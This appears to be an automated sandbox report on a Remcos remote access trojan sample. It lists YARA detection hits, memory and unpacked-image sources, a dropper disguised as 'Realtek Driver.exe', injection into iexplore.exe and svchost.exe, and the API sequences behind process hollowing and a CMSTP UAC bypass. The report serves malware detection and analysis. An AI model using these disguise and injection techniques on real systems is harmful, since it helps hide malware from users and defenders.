                            Source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: Process Memory Space: 1.exe PID: 4956, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: Process Memory Space: Realtek Driver.exe PID: 6508, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: Process Memory Space: iexplore.exe PID: 3716, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: Process Memory Space: svchost.exe PID: 3448, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: Process Memory Space: Realtek Driver.exe PID: 1352, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: Process Memory Space: Realtek Driver.exe PID: 4996, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: Process Memory Space: Realtek Driver.exe PID: 6552, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_0041330D
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,0_2_0041BBC6
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041BB9A
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D8812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,3_2_02D8812A
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,4_2_0304330D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304BB9A OpenProcess,NtSuspendProcess,CloseHandle,4_2_0304BB9A
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304BBC6 OpenProcess,NtResumeProcess,CloseHandle,4_2_0304BBC6
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,5_2_0041330D
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,5_2_0041BBC6
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,5_2_0041BB9A
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004167EF
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D867EF ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_02D867EF
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030467EF ExitWindowsEx,LoadLibraryA,GetProcAddress,4_2_030467EF
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_004167EF
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043706A0_2_0043706A
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004140050_2_00414005
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043E11C0_2_0043E11C
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004541D90_2_004541D9
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004381E80_2_004381E8
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041F18B0_2_0041F18B
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004462700_2_00446270
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043E34B0_2_0043E34B
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004533AB0_2_004533AB
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0042742E0_2_0042742E
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004375660_2_00437566
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043E5A80_2_0043E5A8
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004387F00_2_004387F0
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043797E0_2_0043797E
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004339D70_2_004339D7
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044DA490_2_0044DA49
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00427AD70_2_00427AD7
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041DBF30_2_0041DBF3
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00427C400_2_00427C40
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00437DB30_2_00437DB3
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00435EEB0_2_00435EEB
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043DEED0_2_0043DEED
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00426E9F0_2_00426E9F
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DB62703_2_02DB6270
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DC33AB3_2_02DC33AB
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DAE34B3_2_02DAE34B
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA706A3_2_02DA706A
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D840053_2_02D84005
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DC41D93_2_02DC41D9
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA81E83_2_02DA81E8
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D8F18B3_2_02D8F18B
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DAE11C3_2_02DAE11C
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA87F03_2_02DA87F0
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D9742E3_2_02D9742E
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DAE5A83_2_02DAE5A8
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA75663_2_02DA7566
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D97AD73_2_02D97AD7
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DBDA493_2_02DBDA49
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D8DBF33_2_02D8DBF3
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA39D73_2_02DA39D7
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA797E3_2_02DA797E
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA5EEB3_2_02DA5EEB
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DADEED3_2_02DADEED
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D96E9F3_2_02D96E9F
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D97C403_2_02D97C40
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02DA7DB33_2_02DA7DB3
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E34B4_2_0306E34B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030833AB4_2_030833AB
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030762704_2_03076270
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E11C4_2_0306E11C
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304F18B4_2_0304F18B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030841D94_2_030841D9
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030681E84_2_030681E8
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030440054_2_03044005
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306706A4_2_0306706A
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030687F04_2_030687F0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030675664_2_03067566
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E5A84_2_0306E5A8
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305742E4_2_0305742E
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304DBF34_2_0304DBF3
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307DA494_2_0307DA49
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03057AD74_2_03057AD7
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306797E4_2_0306797E
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030639D74_2_030639D7
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03056E9F4_2_03056E9F
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306DEED4_2_0306DEED
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03065EEB4_2_03065EEB
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03067DB34_2_03067DB3
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03057C404_2_03057C40
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0043706A5_2_0043706A
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004140055_2_00414005
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0043E11C5_2_0043E11C
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004541D95_2_004541D9
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004381E85_2_004381E8
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0041F18B5_2_0041F18B
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004462705_2_00446270
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0043E34B5_2_0043E34B
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004533AB5_2_004533AB
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0042742E5_2_0042742E
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004375665_2_00437566
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0043E5A85_2_0043E5A8
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004387F05_2_004387F0
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0043797E5_2_0043797E
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_004339D75_2_004339D7
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0044DA495_2_0044DA49
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00427AD75_2_00427AD7
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0041DBF35_2_0041DBF3
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00427C405_2_00427C40
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00437DB35_2_00437DB3
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00435EEB5_2_00435EEB
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0043DEED5_2_0043DEED
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_00426E9F5_2_00426E9F
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03031E65 appears 34 times
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03064E70 appears 54 times
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03032093 appears 50 times
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03064801 appears 41 times
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: String function: 00402093 appears 50 times
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: String function: 00401E65 appears 34 times
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: String function: 00434E70 appears 54 times
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: String function: 00434801 appears 42 times
                            Source: C:\Users\user\Desktop\1.exeCode function: String function: 00402093 appears 50 times
                            Source: C:\Users\user\Desktop\1.exeCode function: String function: 00401E65 appears 34 times
                            Source: C:\Users\user\Desktop\1.exeCode function: String function: 00434E70 appears 54 times
                            Source: C:\Users\user\Desktop\1.exeCode function: String function: 00434801 appears 42 times
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 02DA4801 appears 41 times
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 02D72093 appears 50 times
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 02D71E65 appears 34 times
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 02DA4E70 appears 54 times
                            Source: 1.exe, 00000000.00000003.2022051261.0000000000589000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs 1.exe
                            Source: 1.exe, 00000000.00000002.2022398909.0000000000589000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs 1.exe
                            Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 1.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 1.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 1.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
